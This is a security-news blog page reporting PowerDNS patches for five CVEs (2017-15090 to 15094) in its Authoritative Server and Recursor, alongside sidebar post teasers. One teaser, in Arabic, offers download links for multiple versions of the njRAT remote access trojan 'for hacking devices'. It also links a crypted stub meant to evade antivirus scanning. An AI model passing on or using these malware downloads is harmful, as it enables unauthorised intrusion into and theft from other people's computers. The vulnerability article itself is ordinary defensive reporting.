PowerDNS patches five security holes in widely used nameserver software


PowerDNS patches five security holes


PowerDNS, the company behing the popular open source DNS software of the same name, has pushed out security updates and patches for its Authoritative Server and Recursor offerings that, among other things, fix five security vulnerabilities of note.
“PowerDNS users and customers include leading telecommunications service providers, large scale integrators, Wikipedia, content distribution networks, cable networks / multi service operators and Fortune 500 software companies,” the company proclaims on their site.
“In various important markets, such as Scandinavia, Germany and The Netherlands, PowerDNS is the number one supplier of nameserver software.”

About the vulnerabilities

PowerDNS developer Remi Gacogne detailed the vulnerabilities in a post on the Open Source Security Mailing List (oss-sec), and pointed out each of them can be exploited only if the target has a specific configuration that is not enabled
by default.
The security issues, numbered sequentially CVE-2017-15090 to CVE-2017-15094, can’t lead to system compromise, but can be used to alter the content of records, cause Denial of Service, altering the content of web interfaces, change configurations, and lead to a memory leak.
CVE-2017-15091, they only vulnerability among them that affects the PowerDNS Authoritative server, can be triggered only by attackers who got their hands on valid API credentials.
CVE-2017-15090 can be exploited by attackers who have achieved a man-in-the-middle position to issue a valid signature for bogus DNSSEC records.
CVE-2017-15093 can also only be triggered by attackers with valid API credentials, allowing them to inject new configuration directives into the Recursor’s configuration.
The vulnerabilities have been flagged by Kees Monshouwer, everyman, Chris Navarrete of Fortinet’s Fortiguard Labs, and researchers from cybersecurity company Nixu (during a source code audit).
Risk arising from two of the flaws can be mitigated via workarounds, but implementing the updates (PowerDNS Authoritative 4.0.5 and Recursor 4.0.7) and patches (for the 3.4.11 and 3.7.4 releases) is the preferred solution.

Comments

Post a Comment

Popular posts from this blog

تحميل اصدارات برنامج njRAT لاختراق الاجهزة 2017

Image
تحميل   اصدارات برنامج  njRAT  لاختراق الاجهزة  2017 ---------------------------------------------------------------------------------------------- السلام عليكم ورحمة الله تعالى وبركاته تحميل جميع اصدارات برنامج  njRAT  الشهير لاختراق الاجهزة مع تشفيرة متواضعة  لستب njRAT 5 نتيجة فحص تشفيرة الستب http://pscan.xyz/results.php?id=VbGXRoAJjWiEeSHH الان ناتي الى التحميل njRAT_v0.3.5 للتحميل https://up.top4top.net/downloadf-483nr2oz4-rar.html njRAT_v0.4.1 https://up.top4top.net/downloadf-483nhv6j2-rar.html njRAT_v0.5.0 للتحميل https://up.top4top.net/downloadf-483nihol1-rar.html njRAT-v0.6.4 للتحميل https://up.top4top.net/downloadf-483dr2zk1-rar.html njRAT-v0.7d
Read more

Cybersecurity in 2018: Three predictions and one hope

Image
Effective cybersecurity means keeping a close eye on the threats you currently face, and an even closer eye on the threats to come. As you consider your security strategy and investments for the coming year, here are three key trends that will define the threat landscape in 2018, and one hope for a more effective approach to protection.  Risk will continue to shift from infrastructure to the application layer As web apps have evolved from basic information and ecommerce functionality to full-fledged online services, their code and customer data have made them an increasingly appealing target for hackers. Not only are they accessible via the open Internet—they’re also woefully underprotected, with the application layer drawing only 3 percent of the typical security budget at a time when it accounts for 30 percent of successful breaches, according to Verizon. While an incident of the magnitude of the Equifax breach can hardly be said to have a silver lining, at
Read more

Which phishing messages have a near 100% click rate?

Image
Training employees to spot phishing emails, messages and phone calls can’t be done just once or once a year if the organization wants to see click rates decrease. For one thing, employees come and go (and change roles) with regularity. Secondly, threats change over time. Thirdly, knowledge and practices that aren’t regularly reinforced will be lost. And, finally, awareness isn’t the same as knowledge. “Just knowing a threat exists isn’t the same as knowing how to recognize and respond to a threat when it presents itself. In-depth education about phishing prevention is needed to create lasting behavior change,” Wombat Security researchers point out. The statistics included in the company’s latest annual State of the Phish report show the difference made by both the tools used to train end users to recognize and avoid phishing attacks and how often they are used. In the US, most organizations use computer-based online security awareness training and simulated
Read more